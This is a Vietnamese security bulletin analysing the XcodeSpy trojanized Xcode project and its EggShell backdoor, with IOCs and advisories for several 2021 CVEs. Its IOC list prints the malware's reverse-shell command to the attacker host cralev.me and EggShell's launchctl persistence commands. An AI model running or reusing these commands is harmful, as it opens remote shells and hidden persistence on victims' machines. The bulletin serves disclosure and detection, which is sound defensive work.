Kỹ thuật đơn giản để ẩn và khởi chạy một tập lệnh độc hại được sử dụng bởi XcodeSpy có thể được triển khai trong bất kỳ Xcode project nào được chia sẻ. Do đó, tất cả các nhà phát triển của Apple được cảnh báo kiểm tra sự hiện diện của các lệnh độc hại bất cứ khi nào áp dụng các Xcode project của bên thứ ba.

Lạm dụng chức năng Run Script của Xcode

XcodeSpy tận dụng lợi thế của một tính năng tích hợp trong IDE của Apple, cho phép các nhà phát triển chạy một tập lệnh shell tùy chỉnh khi khởi chạy một phiên bản của ứng dụng mục tiêu của họ. Mặc dù kỹ thuật này rất dễ xác định nếu được tìm kiếm, nhưng các nhà phát triển mới hoặc thiếu kinh nghiệm không biết về tính năng Run Script đặc biệt gặp rủi ro vì không có dấu hiệu nào trong bảng điều khiển hoặc trình gỡ lỗi cho biết việc thực thi tập lệnh độc hại.

Mẫu mà nhà nghiên cứu phân tích đã sử dụng bản sao của một dự án nguồn mở hợp pháp có thể tìm thấy trên Github có tên TabBarInteraction. Để tránh bất kỳ nghi ngờ nào, mã trong Github không bị nhiễm XcodeSpy, cũng không phải là nhà phát triển, potato04, có liên quan đến hoạt động phần mềm độc hại.

Trong phiên bản TabBarInteraction đã được sửa đổi, bạn có thể tìm thấy bản malscript bị xáo trộn trong tab Build Phase. Theo mặc định, bảng Run Script không được mở rộng, hỗ trợ thêm cho phần mềm độc hại để tránh bị phát hiện bằng cách kiểm tra thông thường.

Nhấp vào nút disclosure cho thấy sự tồn tại của tập lệnh bị xáo trộn.

Phương thức obfuscation là khá đơn giản và đầu ra có thể được kiểm tra một cách an toàn bằng cách thay thế “eval” với “echo” và chạy kịch bản trong một shell riêng biệt.

Các script tạo ra một tập tin ẩn gọi là “.tag“ trong thư mục “/tmp”, trong đó có một lệnh duy nhất: “mdbcmd”. Điều này tạo ra một đường ống qua reverse shell đến C2 của những kẻ tấn công.

Như nhà nghiên cứu đã xác nhận vào ngày 18/3/2021, mẫu không được phát hiện bởi bất kỳ engine tĩnh nào trên VirusTotal.

Liên kết XcodeSpy với EggShell backdoor

Vào thời điểm nhà nghiên cứu phát hiện ra Xcode project độc hại, C2 tại “cralev[.]me” đã ngoại tuyến, vì vậy không thể xác định trực tiếp kết quả của lệnh “mdbcmd”. Tuy nhiên, may mắn thay, có hai mẫu backdoor EggShell trên VirusTotal có chứa chuỗi XcodeSpy “/private/tmp/.tag”.

6d93a714dd008746569c0fbd00fadccbd5f15eef06b200a4e831df0dc8f3d05b
cdad080d2caa5ca75b658ad102987338b15c7430c6f51792304ef06281a7e134

Cả hai mẫu này đều được tải lên VirusTotal thông qua giao diện Web từ Nhật Bản, mẫu đầu tiên vào ngày 5 tháng 8 và mẫu thứ hai vào ngày 13 tháng 10.

Mẫu sau đó cũng được tìm thấy trên mạng vào cuối năm 2020 trên máy Mac của một nạn nhân ở Hoa Kỳ. Vì lý do bảo mật, nhà nghiên cứu không thể cung cấp thêm chi tiết về sự cố ITW. Tuy nhiên, nạn nhân cho biết họ liên tục bị nhắm mục tiêu bởi các nhóm APT của Triều Tiên.

Các mẫu được tải lên từ Nhật Bản lên VirusTotal đến từ những người dùng không đăng nhập vào tài khoản VirusTotal, vì vậy không thể nói liệu chúng đến từ cùng một nguồn hay hai nguồn khác nhau. Tuy nhiên, cả hai đều được liên kết với nhau và Xcode project thông qua chuỗi chứa “P4CCeYZxhHU/hH2APz6EcXc=”, hóa ra là một phiên bản mã hóa của “/private/tmp/.tag” chuỗi được tìm thấy trong Xcode project độc hại.

Các backdoor của EggShell sử dụng một kỹ thuật mã hóa chuỗi đơn giản. Để giải mã một chuỗi malware chuyển chuỗi đó đến [StringUtil decode:], phương thức này sẽ giải mã chuỗi base64, sau đó lặp lại từng byte, thêm “0xf0” vào đó. Điều này tạo ra một mã ký tự ASCII có thể in được, sau đó được nối với nhau để tạo ra chuỗi đầy đủ.

Người phân tích có thể triển khai bộ giải mã của riêng mình trong Objective-C dựa trên mã giả ở trên để giải mã các chuỗi trong mã nhị phân Mach-O.

Giải mã các chuỗi khác trong cả hai biến thể cho thấy một số URL được mã hóa cứng được sử dụng để tải lên dữ liệu từ máy của nạn nhân.

https: //www.suppro.co/category/search.php?ts=%@ https: //www.liveupdate.cc/preview/update.php?ts=%@ https: //www.appmarket.co/ category / search.php? ts =% @ https: //www.recentnews.cc/latest/details.php?ts=%@ https: //www.truckrental.cc/order/search.php?ts=%@ https: //www.everestnote.com/sheet/list.php?ts=%@ https: //www.alinbox.co/product/product_detail.php?ts=%@

Khi dữ liệu tồn tại, tất cả các miền này từ lần đầu tiên được yêu cầu trên “whois” vào ngày 10 hoặc 11 tháng 9.

Tên miền “cralev[.]me” từ Xcode project độc hại cũng được nhìn thấy lần đầu tiên vào ngày 10 tháng 9.

Phiên bản được kiểm duyệt của TabBarInteraction Xcode project đã được xuất hiện lần đầu tiên trên VirusTotal một tuần trước đó, vào ngày 4 tháng 9.

Sự trùng lặp của những ngày này khiến nhà nghiên cứu suy đoán rằng chính những kẻ tấn công có thể đã tải tệp dự án XcodeSpy lên VirusTotal để kiểm tra phát hiện trước khi kích hoạt C2 của chúng. Ngoài miền “suppro[.]co” và “cralev[.]me”, những miền khác dường như không hoạt động hoặc chưa được đăng ký, có thể đang chờ sử dụng trong tương lai. Điều thú vị là mã quốc gia có sẵn từ VT về vị trí của người tải lên XcodeSpy là ‘ZZ’ – không xác định.

Trong khi đó, các biến thể backdoor của EggShell lần đầu tiên được xuất hiện trên VirusTotal cách nhau khoảng hai tháng (ngày 5 tháng 8 và ngày 13 tháng 10). Nếu các cửa hậu được tải lên bởi nạn nhân chứ không phải là những kẻ tấn công (một giả định không có nghĩa là an toàn), điều đó cho thấy rằng tệp nhị phân EggShell đầu tiên có thể là payload cho một mẫu XcodeSpy trước đó. Tuy nhiên, nhà nghiên cứu không thể gán độ tin cậy lớn cho những suy đoán này dựa trên dữ liệu có sẵn. Những gì chúng ta biết là payload EggShell đầu tiên đã được tải lên một tháng trước khi dropper được biết đến và hơn hai tháng trước khi payload thứ hai được nhìn thấy trên VirusTotal vào ngày 13 tháng 10.

Hành vi thực thi EggShell

Khi thực thi, các mã nhị phân EggShell tùy chỉnh sẽ thả một LaunchAgent tại “~/Library/LaunchAgents/com.apple.usagestatistics.plist” hoặc “~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist”. Bảng xếp hạng này kiểm tra xem tệp thực thi ban đầu có đang chạy hay không; nếu không, nó sẽ tạo một bản sao của tệp thực thi từ phiên bản ‘chính’ “~/Library/Application Support/com.apple.AppStore/.update” sau đó thực thi nó.

EggShell cũng thả một tệp byte 0 vào “/private/tmp/wt0217.lck” và một tệp dữ liệu tại “~/Library/Application Scripts/com.apple.Preview.stors”. Một số đường dẫn tệp khác cũng được mã hóa trong tệp nhị phân (xem IoC ở cuối mục này để biết danh sách đầy đủ). Hầu hết tất cả các đường dẫn này đã được tùy chỉnh bởi kẻ tấn công. Tuy nhiên, một chuỗi được mã hóa sẽ giải mã thành “/tmp/.avatmp”, một đường dẫn mặc định được tìm thấy EggShell public storage để lưu trữ các AV capture.

Mã nguồn trong EggShell public storage chứa nhiều chức năng khác nhau để duy trì, chụp ảnh màn hình và AV recording, trong số những thứ khác.

Phân tích các biến thể XcodeSpy đã biên dịch được tìm thấy trên mạng và trên VirusTotal triển khai các biến thể này có các phương pháp mã hóa dữ liệu và keylogging tùy chỉnh của riêng chúng.

 

Phát hiện và ngăn chặn

Danh sách đầy đủ các IoC đã biết được cung cấp ở cuối bài đăng này. Vì tất cả các C2, tên đường dẫn và chuỗi được mã hóa đều có khả năng tùy chỉnh cao và dễ thay đổi, chúng chỉ có thể hữu ích như là dấu hiệu phát hiện trong quá khứ đối với các mẫu cụ thể này. Do đó, cần phải có giải pháp phát hiện hành vi để phát hiện đầy đủ sự hiện diện của các payload XcodeSpy.

Bất kỳ ai lo ngại về việc liệu họ có vô tình tải xuống một dự án chứa XcodeSpy thì có thể chạy tìm kiếm thủ công với những lệnh sau để kiểm tra:

find . -name “project.pbxproj” -print0 | xargs -0 awk ‘/ shellScript / && / eval / {print “\ 033 [37m”  $ 0  “\ 033 [31m” FILENAME} ”

Thao tác này tìm kiếm Run Scripts trong phần Build Phases của Xcode project (trong project.pbxproj) có chứa cả chuỗi shellScript và eval hay không. Nếu bất kỳ cái nào được tìm thấy, nó sẽ in ra một bản sao của tập lệnh để kiểm tra, cùng với tên tệp mà nó được tìm thấy.

Ví dụ sau tìm kiếm XcodeSpy trong thư mục Documents và tất cả các thư mục con của nó.

Người dùng nên chuyển sang thư mục mẹ thích hợp để lưu các Xcode project trước khi chạy lệnh.

Phần kết luận

Đây không phải là lần đầu tiên những kẻ tấn công sử dụng Xcode như một vector để lây nhiễm cho các nhà phát triển nền tảng Apple. Vào năm 2015, XcodeGhost đã cung cấp cho các nhà phát triển iOS ở Trung Quốc một phiên bản Xcode tải xuống từ một mirror server nhanh hơn từ máy chủ của Apple. Điều mà người nhận không biết là phiên bản Xcode mà họ nhận được đã bị thay đổi để đưa mã độc vào bất kỳ ứng dụng nào được biên dịch với nó. Những ứng dụng được biên dịch với XcodeGhost có thể bị những kẻ tấn công sử dụng để đọc và ghi vào khay nhớ tạm của thiết bị, mở các URL cụ thể (ví dụ: WhatsApp, Facebook) và chuyển dữ liệu sang C2. Trên thực tế, XcodeGhost là một cuộc tấn công chuỗi cung ứng, lây nhiễm cho các nạn nhân ở hạ nguồn thông qua phần mềm của bên thứ ba.

Ngược lại, XcodeSpy có dạng một Xcode project đã được trojanized, làm cho nó nhẹ hơn và dễ phân phối hơn so với phiên bản đầy đủ của Xcode IDE. Mặc dù XcodeSpy dường như được nhắm mục tiêu trực tiếp vào chính các nhà phát triển hơn là các sản phẩm hoặc khách hàng của nhà phát triển, nhưng đó là một bước đệm để tấn công từ môi trường làm việc của nhà phát triển đến hệ thống phân phối phần mềm độc hại cho người dùng phần mềm của nhà phát triển đó.

Hoàn toàn có khả năng XcodeSpy có thể đã được nhắm mục tiêu vào một nhà phát triển hoặc một nhóm nhà phát triển cụ thể. Những kẻ tấn công có thể chỉ đơn giản là dò tìm các mục tiêu thú vị và thu thập dữ liệu cho các chiến dịch trong tương lai hoặc chúng có thể đang cố gắng thu thập thông tin đăng nhập AppleID để sử dụng trong các chiến dịch khác sử dụng phần mềm độc hại có chữ ký Nhà phát triển Apple hợp lệ.

Nguồn: SentinelLABs

IOC

URLs & Resolving IPs
www[.]cralev.me/
hxxps://www[.]liveupdate.cc/preview/update.php
hxxps://www[.]appmarket.co/category/search.php
hxxps://www[.]recentnews.cc/latest/details.php
hxxps://www[.]truckrental.cc/order/search.php
hxxps://www[.]everestnote.com/sheet/list.php
hxxps://www[.]alinbox.co/product/product_detail.php
hxxps://www[.]suppro.co/category/search.php

193.34.167.111
193.34.167.205

EggShell bins: */.update
SHA 256: 6d93a714dd008746569c0fbd00fadccbd5f15eef06b200a4e831df0dc8f3d05b
SHA 1: 556a2174398890e3d628aec0163a42a7b7fb8ffd
SHA 256: cdad080d2caa5ca75b658ad102987338b15c7430c6f51792304ef06281a7e134
SHA 1: 0ae9d61185f793c6d53e560e91265583675abeb6

Xcode proj: TabBarInteraction.zip
SHA 256: 1cfa154d0145c1fe059ffe61e7b295c16bbc0e0b0e707e7ad0b5f76c7d6b66d2
SHA 1: d65334d6c829955947f0ceb2258581c59cfd7dab

Encoded Filepaths
~/Library/Application Scripts/com.apple.TextEdit/.stors
~/Library/Application Scripts/com.apple.Preview/.stors
~/Library/Application Scripts/com.apple.usernoted/.wfy1607
~/Library/Application Scripts/com.apple.TextEdit/.scriptdb
~/Library/Application Support/com.apple.AppStore/.update
~/Library/Application Support/com.apple.usernoted/.wfy1607
~/Library/LaunchAgents/com.apple.usagestatistics.plist
~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist
/private/tmp/.osacache
/private/tmp/.osacache2
/private/tmp/.update
/tmp/.avatmp
/private/tmp/.wt0217.lck
/private/tmp/.tag

Behavioral Indicators
killall %@;sleep 3;cp “%@” “%@”;chmod +x “%@”;”%@” %@ 1>/dev/null 2>/dev/null
if (! pgrep -x %@ >/dev/null);then cp “%@” “%@”;chmod +x “%@”;”%@”;fi;
sleep 1;launchctl unload “%@” > /dev/null;launchctl load “%@” > /dev/null
launchctl unload “%@” 2>/dev/null; rm “%@”
echo mdbcmd > /private/tmp/.tag;bash&> /dev/tcp/www.cralev.me/443 0>&1 &

 

3    CVE và các khuyến nghị bảo mật

3.1    Microsoft Patch Tuesday – March 2021

3.1.1    CVE-2021-26411

Internet Explorer Memory Corruption Vulnerability

CVSS Score v3.0: 8.8

Mô tả:

Lỗ hổng này được ghi nhận đã được sử dụng trong một chiến dịch tấn công. Để khai thác lỗ hổng này, kẻ tấn công cần host các đoạn mã khai thác trên một trang web độc hại và lừa người dùng (thông qua phishing hoặc social engineering) truy cập trang web đó. Ngoài ra, kẻ tấn công cũng có thể chèn payload vào một trang web hợp pháp.

Các công nghệ bị ảnh hưởng: Microsoft Internet Explorer: 9, 10, 11

Khuyến nghị, hướng dẫn khắc phục:

Nâng cấp lên phiên bản mới hơn từ trang chủ của nhà cung cấp. Người dùng Microsoft muốn cập nhật ngay lập tức có thể truy cập Start > Settings > Updates & Security > Windows Update trên hệ thống của mình.

3.1.2   CVE-2021-26855

Microsoft Exchange Server Remote Code Execution Vulnerability

CVSS Score v3.0: 9.1

Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi mã tùy ý trên hệ thống. Lỗ hổng bảo mật tồn tại do không xác thực đầy đủ thông tin đầu vào do người dùng cung cấp. Kẻ tấn công từ xa có thể gửi yêu cầu HTTP được tạo ra tới máy chủ Microsoft Exchange, tải lên tệp tùy ý trên máy chủ và thực hiện các hành vi tấn công khác.

Các công nghệ bị ảnh hưởng:

Microsoft Exchange Server: 2013 Cumulative Update 1 – 23, 2013 Service Pack 1, 2016 Cumulative Update 1 – 19, 2019 Cumulative Update 1 – 8.

Khuyến nghị, hướng dẫn khắc phục:

Lỗ hổng này là một phần của chuỗi tấn công. Chuỗi tấn công ban đầu yêu cầu khả năng tạo kết nối đến Exchange server qua cổng 443. Điều này có thể được bảo vệ bằng cách hạn chế các kết nối không đáng tin cậy hoặc thiết lập VPN để tách Exchange server khỏi truy cập bên ngoài. Sử dụng biện pháp giảm nhẹ này sẽ chỉ bảo vệ khỏi phần ban đầu của cuộc tấn công.

Nhà cung cấp khuyến cáo người dùng nên ưu tiên cài đặt các bản cập nhật trên Exchange Server từ trang chủ.

3.1.3    CVE-2021-26897

Windows DNS Server Remote Code Execution Vulnerability

CVSS Score v3.0: 9.8

Mô tả:

Lỗ hổng cho phép kẻ tấn công thực thi mã tùy ý trên hệ thống mục tiêu. Lỗ hổng tồn tại do xác thực đầu vào không đúng trong Windows DNS Server. Kẻ tấn công có thể gửi một yêu cầu được tạo ra đặc biệt và thực thi mã tùy ý trên hệ thống mục tiêu. Việc khai thác thành công lỗ hổng nay có thể dẫn đến sự xâm phạm hoàn toàn hệ thống bị tấn công.

Các công nghệ bị ảnh hưởng:

Windows Server: 2008, 2008 R2, 2012, 2012 R2, 2016, 2019, 2019 20H2, 2019 1909, 2019 2004

Khuyến nghị, hướng dẫn khắc phục:

Nâng cấp lên phiên bản mới hơn từ trang chủ của nhà cung cấp.

3.1.4   Các CVE khác

Danh sách đầy đủ các CVE có thể xem ở đây:

https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar

3.2   Ứng dụng web và các sản phẩm khác

3.2.1   CVE-2021-25281

wheel_async unauth access

CVSS Score v3.0: 8.1

Mô tả: SaltAPI không tồn tại thông tin xác thực cho wheel_async client. Do đó, kẻ tấn công có thể chạy từ xa bất kỳ wheel module nào trên hệ thống.

Khuyến nghị, hướng dẫn khắc phục: Cập nhật bản vá, hoặc bản phát hành Salt mới nhất.

3.2.2   CVE-2021-22986

F5 BIG-IP/BIG-IQ iControl REST RCE

CVSS Score v3.0: 9.8

Mô tả: Giao diện iControl REST có lỗ hổng thực thi lệnh từ xa chưa được xác thực. Lỗ hổng cho phép những kẻ tấn công không được xác thực có quyền truy cập mạng vào giao diện iControl REST, thông qua giao diện quản lý BIG-IP, thực hiện các lệnh hệ thống tùy ý, tạo hoặc xóa tệp và vô hiệu hóa dịch vụ. Lỗ hổng này chỉ có thể được khai thác thông qua control plane và không thể khai thác thông qua data plane. Việc khai thác có thể dẫn đến sự xâm nhập toàn bộ hệ thống. F5 xác nhận hệ thống BIG-IP ở chế độ Appliance cũng tồn tại lỗ hổng này.

Khuyến nghị, hướng dẫn khắc phục: Nâng cấp lên các phiên bản BIG-IP 16.0.1.1, 15.1.2.1, 14.1.4, 13.1.3.6, 12.1.5.3, 11.6.5.3; BIG-IQ 8.0.0, 7.1.0.3 và 7.0.0.2.